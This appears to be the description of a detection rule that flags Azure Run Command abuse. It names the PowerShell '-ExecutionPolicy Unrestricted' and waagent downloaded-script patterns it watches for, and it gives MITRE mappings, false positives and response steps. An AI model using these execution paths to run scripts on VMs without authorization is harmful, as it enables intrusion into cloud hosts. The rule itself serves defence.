Identifies Windows and Linux endpoint process-start events where the parent process matches Azure Run Command execution patterns. On Windows, Run Command often launches PowerShell with -ExecutionPolicy Unrestricted and a script?.ps1 file; on Linux, the Azure Linux Agent (waagent) executes a downloaded script.sh under /var/lib/waagent/run-command/. The rule inspects parent process fields (name, command_line, args) to surface on-guest payload activity not fully described by cloud activity logs. It correlates with Azure Run Command actions and maps to MITRE ATT&CK techniques for Command and Scripting Interpreter (PowerShell and Unix Shell) and Cloud Administration Command. The rule is supported by endpoint process data and Windows Sysmon operational logs and is intended to help detect abuse or misuse of Run Command on Azure VMs. False positives may include legitimate automation or extension deployments using the same parent/script patterns; tuning should consider baseline hosts and deployment windows. Recommended response includes validating Azure RBAC, revoking compromised credentials, isolating the guest, and collecting endpoint plus Azure activity artifacts for incident reporting.